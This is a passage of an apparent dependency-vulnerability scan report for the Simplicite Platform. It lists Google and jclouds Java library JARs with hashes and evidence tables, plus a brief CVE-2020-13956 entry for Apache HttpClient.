File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-youtube/v3-rev20190827-1.30.1/google-api-services-youtube-v3-rev20190827-1.30.1.jar
MD5: de23af4810f28bc7e19a236704b5c35a
SHA1: f200641b91698b977a8fbf2c671711b73fadbc14
SHA256: 5790dac99030ec79b164da72c1a6690f4724b8e2b19ee73cd4cadf78a5231e71
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-api-services-youtube-v3-rev20190827 | High
Vendor | jar | package name | api | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | services | Highest
Vendor | jar | package name | youtube | Highest
Vendor | Manifest | automatic-module-name | com.google.api.services.youtube | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | pom | artifactid | google-api-services-youtube | Highest
Vendor | pom | artifactid | google-api-services-youtube | Low
Vendor | pom | groupid | com.google.apis | Highest
Vendor | pom | name | YouTube Data API v3-rev20190827-1.30.1 | High
Vendor | pom | organization name | Google | High
Vendor | pom | organization url | http://www.google.com/ | Medium
Product | file | name | google-api-services-youtube-v3-rev20190827 | High
Product | jar | package name | api | Highest
Product | jar | package name | google | Highest
Product | jar | package name | services | Highest
Product | jar | package name | youtube | Highest
Product | Manifest | automatic-module-name | com.google.api.services.youtube | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | pom | artifactid | google-api-services-youtube | Highest
Product | pom | groupid | com.google.apis | Highest
Product | pom | name | YouTube Data API v3-rev20190827-1.30.1 | High
Product | pom | organization name | Google | Low
Product | pom | organization url | http://www.google.com/ | Low
Version | pom | version | v3-rev20190827-1.30.1 | Highest
google-auth-library-credentials-0.17.1.jar
File Path: /var/simplicite/.m2/repository/com/google/auth/google-auth-library-credentials/0.17.1/google-auth-library-credentials-0.17.1.jar
MD5: 08a308ff0a817928c3e2b0d526174d52
SHA1: c4be8a5be14299801b346233be515fc9a5a87c83
SHA256: aaeea9333fff9b763715bca0174ec76c4f9551b5731c89a95f263cdc82b4b56e
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-auth-library-credentials | High
Vendor | jar | package name | auth | Highest
Vendor | jar | package name | credentials | Highest
Vendor | jar | package name | google | Highest
Vendor | Manifest | automatic-module-name | com.google.auth | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | pom | artifactid | google-auth-library-credentials | Highest
Vendor | pom | artifactid | google-auth-library-credentials | Low
Vendor | pom | groupid | com.google.auth | Highest
Vendor | pom | name | Google Auth Library for Java - Credentials | High
Vendor | pom | parent-artifactid | google-auth-library-parent | Low
Product | file | name | google-auth-library-credentials | High
Product | jar | package name | auth | Highest
Product | jar | package name | credentials | Highest
Product | jar | package name | google | Highest
Product | Manifest | automatic-module-name | com.google.auth | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | pom | artifactid | google-auth-library-credentials | Highest
Product | pom | groupid | com.google.auth | Highest
Product | pom | name | Google Auth Library for Java - Credentials | High
Product | pom | parent-artifactid | google-auth-library-parent | Medium
Version | file | version | 0.17.1 | High
Version | pom | version | 0.17.1 | Highest
google-auth-library-oauth2-http-0.17.1.jar
File Path: /var/simplicite/.m2/repository/com/google/auth/google-auth-library-oauth2-http/0.17.1/google-auth-library-oauth2-http-0.17.1.jar
MD5: 618b04b4e97c0b38557f1c2b53d4c674
SHA1: 740f5e93a9e934f7016d6b494c85cdaa3a436937
SHA256: fa9a1589c8bc279416988d437c2636967cd5e4eff70fbddc986b9c5a77b0231b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-auth-library-oauth2-http | High
Vendor | jar | package name | auth | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | http | Highest
Vendor | jar | package name | oauth2 | Highest
Vendor | Manifest | automatic-module-name | com.google.auth.oauth2 | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | pom | artifactid | google-auth-library-oauth2-http | Highest
Vendor | pom | artifactid | google-auth-library-oauth2-http | Low
Vendor | pom | groupid | com.google.auth | Highest
Vendor | pom | name | Google Auth Library for Java - OAuth2 HTTP | High
Vendor | pom | parent-artifactid | google-auth-library-parent | Low
Product | file | name | google-auth-library-oauth2-http | High
Product | jar | package name | auth | Highest
Product | jar | package name | google | Highest
Product | jar | package name | http | Highest
Product | jar | package name | oauth2 | Highest
Product | Manifest | automatic-module-name | com.google.auth.oauth2 | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | pom | artifactid | google-auth-library-oauth2-http | Highest
Product | pom | groupid | com.google.auth | Highest
Product | pom | name | Google Auth Library for Java - OAuth2 HTTP | High
Product | pom | parent-artifactid | google-auth-library-parent | Medium
Version | file | version | 0.17.1 | High
Version | pom | version | 0.17.1 | Highest
google-cloud-core-1.90.0.jar
Description: Core module for the google-cloud.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-core/1.90.0/google-cloud-core-1.90.0.jar
MD5: 50e8e61b319970ad1618ed735bd671ef
SHA1: ebf5901e8c804ea436856211d066305a0ee1633c
SHA256: dddde94df91ec81ba492d7b105dbd1adb5efc798c9fff1e9bde37c75ec4ca374
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-core | High
Vendor | jar | package name | cloud | Highest
Vendor | jar | package name | google | Highest
Vendor | Manifest | artifactid | google-cloud-core | Low
Vendor | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core | Low
Vendor | Manifest | Implementation-Vendor | Google LLC | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.cloud | Medium
Vendor | Manifest | specification-vendor | Google LLC | Low
Vendor | pom | artifactid | google-cloud-core | Highest
Vendor | pom | artifactid | google-cloud-core | Low
Vendor | pom | groupid | com.google.cloud | Highest
Vendor | pom | name | Google Cloud Core | High
Vendor | pom | parent-artifactid | google-cloud-clients | Low
Vendor | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core | Highest
Product | file | name | google-cloud-core | High
Product | jar | package name | cloud | Highest
Product | jar | package name | google | Highest
Product | Manifest | artifactid | google-cloud-core | Low
Product | Manifest | Implementation-Title | Google Cloud Core | High
Product | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core | Low
Product | Manifest | specification-title | Google Cloud Core | Medium
Product | pom | artifactid | google-cloud-core | Highest
Product | pom | groupid | com.google.cloud | Highest
Product | pom | name | Google Cloud Core | High
Product | pom | parent-artifactid | google-cloud-clients | Medium
Product | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core | High
Version | file | version | 1.90.0 | High
Version | Manifest | Implementation-Version | 1.90.0 | High
Version | Manifest | version | 1.90.0 | Medium
Version | pom | parent-version | 1.90.0 | Low
Version | pom | version | 1.90.0 | Highest
google-cloud-core-grpc-1.90.0.jar
Description: Core gRPC module for the google-cloud.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-core-grpc/1.90.0/google-cloud-core-grpc-1.90.0.jar
MD5: 15da4e1c8fb6e637441199a972e93da0
SHA1: a254b7d693b9ec721600799ebabf679a71855ac7
SHA256: cd771d2c260336e1dd292600b2dd33949b0b1045fee9c8df5e9a8e94c35d3989
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-core-grpc | High
Vendor | jar | package name | cloud | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | grpc | Highest
Vendor | Manifest | artifactid | google-cloud-core-grpc | Low
Vendor | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc | Low
Vendor | Manifest | Implementation-Vendor | Google LLC | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.cloud | Medium
Vendor | Manifest | specification-vendor | Google LLC | Low
Vendor | pom | artifactid | google-cloud-core-grpc | Highest
Vendor | pom | artifactid | google-cloud-core-grpc | Low
Vendor | pom | groupid | com.google.cloud | Highest
Vendor | pom | name | Google Cloud Core gRPC | High
Vendor | pom | parent-artifactid | google-cloud-clients | Low
Vendor | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc | Highest
Product | file | name | google-cloud-core-grpc | High
Product | jar | package name | cloud | Highest
Product | jar | package name | google | Highest
Product | jar | package name | grpc | Highest
Product | Manifest | artifactid | google-cloud-core-grpc | Low
Product | Manifest | Implementation-Title | Google Cloud Core gRPC | High
Product | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc | Low
Product | Manifest | specification-title | Google Cloud Core gRPC | Medium
Product | pom | artifactid | google-cloud-core-grpc | Highest
Product | pom | groupid | com.google.cloud | Highest
Product | pom | name | Google Cloud Core gRPC | High
Product | pom | parent-artifactid | google-cloud-clients | Medium
Product | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-grpc | High
Version | file | version | 1.90.0 | High
Version | Manifest | Implementation-Version | 1.90.0 | High
Version | Manifest | version | 1.90.0 | Medium
Version | pom | parent-version | 1.90.0 | Low
Version | pom | version | 1.90.0 | Highest
google-cloud-core-http-1.90.0.jar
Description: Core http module for the google-cloud.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-core-http/1.90.0/google-cloud-core-http-1.90.0.jar
MD5: 1a34150c8f95c83c515f3caaa0533c68
SHA1: 9098b197d4f84aa79346d7489c44a169066b3a0b
SHA256: 865be501475bde92c41c938f0b100394034e0485ee8921c5e709377f01574731
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-core-http | High
Vendor | jar | package name | cloud | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | http | Highest
Vendor | Manifest | artifactid | google-cloud-core-http | Low
Vendor | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http | Low
Vendor | Manifest | Implementation-Vendor | Google LLC | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.cloud | Medium
Vendor | Manifest | specification-vendor | Google LLC | Low
Vendor | pom | artifactid | google-cloud-core-http | Highest
Vendor | pom | artifactid | google-cloud-core-http | Low
Vendor | pom | groupid | com.google.cloud | Highest
Vendor | pom | name | Google Cloud Core HTTP | High
Vendor | pom | parent-artifactid | google-cloud-clients | Low
Vendor | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http | Highest
Product | file | name | google-cloud-core-http | High
Product | jar | package name | cloud | Highest
Product | jar | package name | google | Highest
Product | jar | package name | http | Highest
Product | Manifest | artifactid | google-cloud-core-http | Low
Product | Manifest | Implementation-Title | Google Cloud Core HTTP | High
Product | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http | Low
Product | Manifest | specification-title | Google Cloud Core HTTP | Medium
Product | pom | artifactid | google-cloud-core-http | Highest
Product | pom | groupid | com.google.cloud | Highest
Product | pom | name | Google Cloud Core HTTP | High
Product | pom | parent-artifactid | google-cloud-clients | Medium
Product | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-core-http | High
Version | file | version | 1.90.0 | High
Version | Manifest | Implementation-Version | 1.90.0 | High
Version | Manifest | version | 1.90.0 | Medium
Version | pom | parent-version | 1.90.0 | Low
Version | pom | version | 1.90.0 | Highest
google-cloud-firestore-1.9.0.jar
Description: Java idiomatic client for Google Cloud Firestore.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-firestore/1.9.0/google-cloud-firestore-1.9.0.jar
MD5: 3eb1110fb18baf2375dbfa6e20a80c87
SHA1: f6364bba713915d21b7eda43e3f65dab743b09bd
SHA256: 0428ec9394c118b4736882723e7da83434446fe8447b31bef7e10928ff7aaa21
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-firestore | High
Vendor | jar | package name | cloud | Highest
Vendor | jar | package name | firestore | Highest
Vendor | jar | package name | google | Highest
Vendor | Manifest | artifactid | google-cloud-firestore | Low
Vendor | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore | Low
Vendor | Manifest | Implementation-Vendor | Google LLC | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.cloud | Medium
Vendor | Manifest | specification-vendor | Google LLC | Low
Vendor | pom | artifactid | google-cloud-firestore | Highest
Vendor | pom | artifactid | google-cloud-firestore | Low
Vendor | pom | groupid | com.google.cloud | Highest
Vendor | pom | name | Google Cloud Firestore | High
Vendor | pom | parent-artifactid | google-cloud-clients | Low
Vendor | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore | Highest
Product | file | name | google-cloud-firestore | High
Product | jar | package name | cloud | Highest
Product | jar | package name | firestore | Highest
Product | jar | package name | google | Highest
Product | Manifest | artifactid | google-cloud-firestore | Low
Product | Manifest | Implementation-Title | Google Cloud Firestore | High
Product | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore | Low
Product | Manifest | specification-title | Google Cloud Firestore | Medium
Product | pom | artifactid | google-cloud-firestore | Highest
Product | pom | groupid | com.google.cloud | Highest
Product | pom | name | Google Cloud Firestore | High
Product | pom | parent-artifactid | google-cloud-clients | Medium
Product | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-firestore | High
Version | file | version | 1.9.0 | High
Version | Manifest | Implementation-Version | 1.9.0 | High
Version | Manifest | version | 1.9.0 | Medium
Version | pom | parent-version | 1.9.0 | Low
Version | pom | version | 1.9.0 | Highest
google-cloud-pubsub-1.91.0.jar
Description: Java idiomatic client for Google Cloud Pub/Sub.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-pubsub/1.91.0/google-cloud-pubsub-1.91.0.jar
MD5: ce6917c11376843f58ae833b9474e871
SHA1: e446bc05cc5c16b1a2e87b5ebd0c2505f7d5cf85
SHA256: af60e5dcc43a53314bce85d283fd7a92115cd98c4a5424f4454f08742e0e4d61
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-pubsub | High
Vendor | jar | package name | cloud | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | pubsub | Highest
Vendor | Manifest | artifactid | google-cloud-pubsub | Low
Vendor | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub | Low
Vendor | Manifest | Implementation-Vendor | Google LLC | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.cloud | Medium
Vendor | Manifest | specification-vendor | Google LLC | Low
Vendor | pom | artifactid | google-cloud-pubsub | Highest
Vendor | pom | artifactid | google-cloud-pubsub | Low
Vendor | pom | groupid | com.google.cloud | Highest
Vendor | pom | name | Google Cloud Pub/Sub | High
Vendor | pom | parent-artifactid | google-cloud-clients | Low
Vendor | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub | Highest
Product | file | name | google-cloud-pubsub | High
Product | jar | package name | cloud | Highest
Product | jar | package name | google | Highest
Product | jar | package name | pubsub | Highest
Product | Manifest | artifactid | google-cloud-pubsub | Low
Product | Manifest | Implementation-Title | Google Cloud Pub/Sub | High
Product | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub | Low
Product | Manifest | specification-title | Google Cloud Pub/Sub | Medium
Product | pom | artifactid | google-cloud-pubsub | Highest
Product | pom | groupid | com.google.cloud | Highest
Product | pom | name | Google Cloud Pub/Sub | High
Product | pom | parent-artifactid | google-cloud-clients | Medium
Product | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-pubsub | High
Version | file | version | 1.91.0 | High
Version | Manifest | Implementation-Version | 1.91.0 | High
Version | Manifest | version | 1.91.0 | Medium
Version | pom | parent-version | 1.91.0 | Low
Version | pom | version | 1.91.0 | Highest
google-cloud-storage-1.91.0.jar
Description: Java idiomatic client for Google Cloud Storage.
File Path: /var/simplicite/.m2/repository/com/google/cloud/google-cloud-storage/1.91.0/google-cloud-storage-1.91.0.jar
MD5: 13b2e0b5ab6841d88e35e144836e30cc
SHA1: 73d7d28a8111ee318b5f4c62fcdb23f57a1066d3
SHA256: 1710c51873f39b25210860f09cfd0c4c4824c1265b41cf136fe21266cf73faa4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-storage | High
Vendor | jar | package name | cloud | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | storage | Highest
Vendor | Manifest | artifactid | google-cloud-storage | Low
Vendor | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage | Low
Vendor | Manifest | Implementation-Vendor | Google LLC | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.cloud | Medium
Vendor | Manifest | specification-vendor | Google LLC | Low
Vendor | pom | artifactid | google-cloud-storage | Highest
Vendor | pom | artifactid | google-cloud-storage | Low
Vendor | pom | groupid | com.google.cloud | Highest
Vendor | pom | name | Google Cloud Storage | High
Vendor | pom | parent-artifactid | google-cloud-clients | Low
Vendor | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage | Highest
Product | file | name | google-cloud-storage | High
Product | jar | package name | cloud | Highest
Product | jar | package name | google | Highest
Product | jar | package name | storage | Highest
Product | Manifest | artifactid | google-cloud-storage | Low
Product | Manifest | Implementation-Title | Google Cloud Storage | High
Product | Manifest | implementation-url | https://github.com/googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage | Low
Product | Manifest | specification-title | Google Cloud Storage | Medium
Product | pom | artifactid | google-cloud-storage | Highest
Product | pom | groupid | com.google.cloud | Highest
Product | pom | name | Google Cloud Storage | High
Product | pom | parent-artifactid | google-cloud-clients | Medium
Product | pom | url | googleapis/google-cloud-java/tree/master/google-cloud-clients/google-cloud-storage | High
Version | file | version | 1.91.0 | High
Version | Manifest | Implementation-Version | 1.91.0 | High
Version | Manifest | version | 1.91.0 | Medium
Version | pom | parent-version | 1.91.0 | Low
Version | pom | version | 1.91.0 | Highest
google-cloud-storage-2.2.0.jar
Description: jclouds components to access Google Cloud Storage
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/provider/google-cloud-storage/2.2.0/google-cloud-storage-2.2.0.jar
MD5: a6e9c25c62e358de98c9b5baefcfc9c9
SHA1: edd29f3d986aa041c0181a88eda4011cb08c2500
SHA256: 6d3af5f58f8a1eec40609dada045f21ecc63e22e30550ad153a366b53fbf1a6b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-cloud-storage | High
Vendor | jar | package name | jclouds | Highest
Vendor | Manifest | bundle-docurl | http://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | google-cloud-storage | Medium
Vendor | Manifest | Implementation-Vendor | jclouds | High
Vendor | Manifest | Implementation-Vendor-Id | org.jclouds | Medium
Vendor | Manifest | specification-vendor | jclouds | Low
Vendor | pom | artifactid | google-cloud-storage | Highest
Vendor | pom | artifactid | google-cloud-storage | Low
Vendor | pom | groupid | org.apache.jclouds.provider | Highest
Vendor | pom | name | jclouds Google Cloud Storage provider | High
Vendor | pom | parent-artifactid | jclouds-project | Low
Vendor | pom | parent-groupid | org.apache.jclouds | Medium
Product | file | name | google-cloud-storage | High
Product | jar | package name | jclouds | Highest
Product | Manifest | bundle-docurl | http://www.apache.org/ | Low
Product | Manifest | Bundle-Name | jclouds Google Cloud Storage provider | Medium
Product | Manifest | bundle-symbolicname | google-cloud-storage | Medium
Product | Manifest | Implementation-Title | jclouds Google Cloud Storage provider | High
Product | Manifest | specification-title | jclouds jclouds Google Cloud Storage provider | Medium
Product | pom | artifactid | google-cloud-storage | Highest
Product | pom | groupid | org.apache.jclouds.provider | Highest
Product | pom | name | jclouds Google Cloud Storage provider | High
Product | pom | parent-artifactid | jclouds-project | Medium
Product | pom | parent-groupid | org.apache.jclouds | Medium
Version | file | version | 2.2.0 | High
Version | Manifest | Bundle-Version | 2.2.0 | High
Version | Manifest | Implementation-Version | 2.2.0 | High
Version | pom | version | 2.2.0 | Highest
google-http-client-1.32.0.jar
Description: Google HTTP Client Library for Java. Functionality that works on all supported Java platforms, including Java 7 (or higher) desktop (SE) and web (EE), Android, and Google App Engine.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client/1.32.0/google-http-client-1.32.0.jar
MD5: 159df863621fa372f142eb49def7ea62
SHA1: 2b45a89cd795c70ccb203d5b20cc13b50105e71e
SHA256: 6fd9e819d8d75bcedcb2ba9d8e08496b5160b3f855a50057f5d9f6850bbf0e4c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-http-client | High
Vendor | jar | package name | api | Highest
Vendor | jar | package name | client | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | http | Highest
Vendor | Manifest | automatic-module-name | com.google.api.client | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | Manifest | bundle-docurl | http://www.google.com/ | Low
Vendor | Manifest | bundle-symbolicname | com.google.http-client.google-http-client | Medium
Vendor | Manifest | Implementation-Vendor | Google | High
Vendor | Manifest | Implementation-Vendor-Id | com.google.http-client | Medium
Vendor | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | pom | artifactid | google-http-client | Highest
Vendor | pom | artifactid | google-http-client | Low
Vendor | pom | groupid | com.google.http-client | Highest
Vendor | pom | name | Google HTTP Client Library for Java | High
Vendor | pom | parent-artifactid | google-http-client-parent | Low
Product | file | name | google-http-client | High
Product | jar | package name | api | Highest
Product | jar | package name | client | Highest
Product | jar | package name | google | Highest
Product | jar | package name | http | Highest
Product | Manifest | automatic-module-name | com.google.api.client | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | Manifest | bundle-docurl | http://www.google.com/ | Low
Product | Manifest | Bundle-Name | Google HTTP Client Library for Java | Medium
Product | Manifest | bundle-symbolicname | com.google.http-client.google-http-client | Medium
Product | Manifest | Implementation-Title | Google HTTP Client Library for Java | High
Product | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | pom | artifactid | google-http-client | Highest
Product | pom | groupid | com.google.http-client | Highest
Product | pom | name | Google HTTP Client Library for Java | High
Product | pom | parent-artifactid | google-http-client-parent | Medium
Version | file | version | 1.32.0 | High
Version | Manifest | Bundle-Version | 1.32.0 | High
Version | Manifest | Implementation-Version | 1.32.0 | High
Version | pom | version | 1.32.0 | Highest
google-http-client-appengine-1.31.0.jar
File Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-appengine/1.31.0/google-http-client-appengine-1.31.0.jar
MD5: e98ce3f240ef969a94c0b46bd7398ceb
SHA1: 8e9f1aa1e843727351b14ffce2bda4416363b67a
SHA256: c3a96061666b43615919cfb4314c512b067c087efef1de4069d856ff43dc15cf
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-http-client-appengine | High
Vendor | jar | package name | client | Highest
Vendor | jar | package name | extensions | Highest
Vendor | jar | package name | google | Highest
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | pom | artifactid | google-http-client-appengine | Highest
Vendor | pom | artifactid | google-http-client-appengine | Low
Vendor | pom | groupid | com.google.http-client | Highest
Vendor | pom | name | Google App Engine extensions to the Google HTTP Client Library for Java. | High
Vendor | pom | parent-artifactid | google-http-client-parent | Low
Product | file | name | google-http-client-appengine | High
Product | jar | package name | client | Highest
Product | jar | package name | extensions | Highest
Product | jar | package name | google | Highest
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | pom | artifactid | google-http-client-appengine | Highest
Product | pom | groupid | com.google.http-client | Highest
Product | pom | name | Google App Engine extensions to the Google HTTP Client Library for Java. | High
Product | pom | parent-artifactid | google-http-client-parent | Medium
Version | file | version | 1.31.0 | High
Version | pom | version | 1.31.0 | Highest
google-http-client-gson-1.32.0.jar
File Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-gson/1.32.0/google-http-client-gson-1.32.0.jar
MD5: 836f19bb2f7b603363fca036e77694ab
SHA1: 64c62622f4071f2116e8f3e8c79e1902c6eb732f
SHA256: da0c814b3bebc0500b3603c81c54630d295694b3db3738be9747dd7230cad37a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-http-client-gson | High
Vendor | jar | package name | api | Highest
Vendor | jar | package name | client | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | json | Highest
Vendor | Manifest | automatic-module-name | com.google.api.client.json.gson | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | pom | artifactid | google-http-client-gson | Highest
Vendor | pom | artifactid | google-http-client-gson | Low
Vendor | pom | groupid | com.google.http-client | Highest
Vendor | pom | name | GSON extensions to the Google HTTP Client Library for Java. | High
Vendor | pom | parent-artifactid | google-http-client-parent | Low
Product | file | name | google-http-client-gson | High
Product | jar | package name | api | Highest
Product | jar | package name | client | Highest
Product | jar | package name | google | Highest
Product | jar | package name | json | Highest
Product | Manifest | automatic-module-name | com.google.api.client.json.gson | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | pom | artifactid | google-http-client-gson | Highest
Product | pom | groupid | com.google.http-client | Highest
Product | pom | name | GSON extensions to the Google HTTP Client Library for Java. | High
Product | pom | parent-artifactid | google-http-client-parent | Medium
Version | file | version | 1.32.0 | High
Version | pom | version | 1.32.0 | Highest
google-http-client-jackson-1.29.2.jar
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-jackson/1.29.2/google-http-client-jackson-1.29.2.jar
MD5: 72ad680f4cd70758086ec12492544fcd
SHA1: 98ba3a73bbfcabbaa1105fc013305d319f6ebf32
SHA256: 54478a70cc90eb7fd7e6ab89a447a41fb1f4f98201bf4d5418d4647751538552
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-http-client-jackson | High
Vendor | jar | package name | api | Highest
Vendor | jar | package name | client | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | json | Highest
Vendor | Manifest | automatic-module-name | com.google.api.client.json.jackson | Medium
Vendor | Manifest | bundle-docurl | http://www.google.com/ | Low
Vendor | Manifest | bundle-symbolicname | com.google.http-client.google-http-client-jackson | Medium
Vendor | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | pom | artifactid | google-http-client-jackson | Highest
Vendor | pom | artifactid | google-http-client-jackson | Low
Vendor | pom | groupid | com.google.http-client | Highest
Vendor | pom | name | Jackson extensions to the Google HTTP Client Library for Java. | High
Vendor | pom | parent-artifactid | google-http-client-parent | Low
Product | file | name | google-http-client-jackson | High
Product | jar | package name | api | Highest
Product | jar | package name | client | Highest
Product | jar | package name | google | Highest
Product | jar | package name | json | Highest
Product | Manifest | automatic-module-name | com.google.api.client.json.jackson | Medium
Product | Manifest | bundle-docurl | http://www.google.com/ | Low
Product | Manifest | Bundle-Name | Jackson extensions to the Google HTTP Client Library for Java. | Medium
Product | Manifest | bundle-symbolicname | com.google.http-client.google-http-client-jackson | Medium
Product | Manifest | originally-created-by | Apache Maven Bundle Plugin | Low
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | pom | artifactid | google-http-client-jackson | Highest
Product | pom | groupid | com.google.http-client | Highest
Product | pom | name | Jackson extensions to the Google HTTP Client Library for Java. | High
Product | pom | parent-artifactid | google-http-client-parent | Medium
Version | file | version | 1.29.2 | High
Version | Manifest | Bundle-Version | 1.29.2 | High
Version | pom | version | 1.29.2 | Highest
CVE-2020-13956
Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.
CWE: NVD-CWE-noinfo
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
References:
Vulnerable Software & Versions:
google-http-client-jackson2-1.32.0.jarFile Path: /var/simplicite/.m2/repository/com/google/http-client/google-http-client-jackson2/1.32.0/google-http-client-jackson2-1.32.0.jarMD5: b21303bba460a5525bd0f7219d1e6339SHA1: fa975dca9d9896896b3e9d51961833f72965c55eSHA256: 4cc7c7b0cf0cf03cb7264763efbacee8af4621eb09a51a078331f3f717c09694Referenced In Project/Scope: Simplicite Platform:compile
Evidence

| Type | Source | Name | Value | Confidence |
|---|---|---|---|---|
| Vendor | file | name | google-http-client-jackson2 | High |
| Vendor | jar | package name | api | Highest |
| Vendor | jar | package name | client | Highest |
| Vendor | jar | package name | google | Highest |
| Vendor | jar | package name | json | Highest |
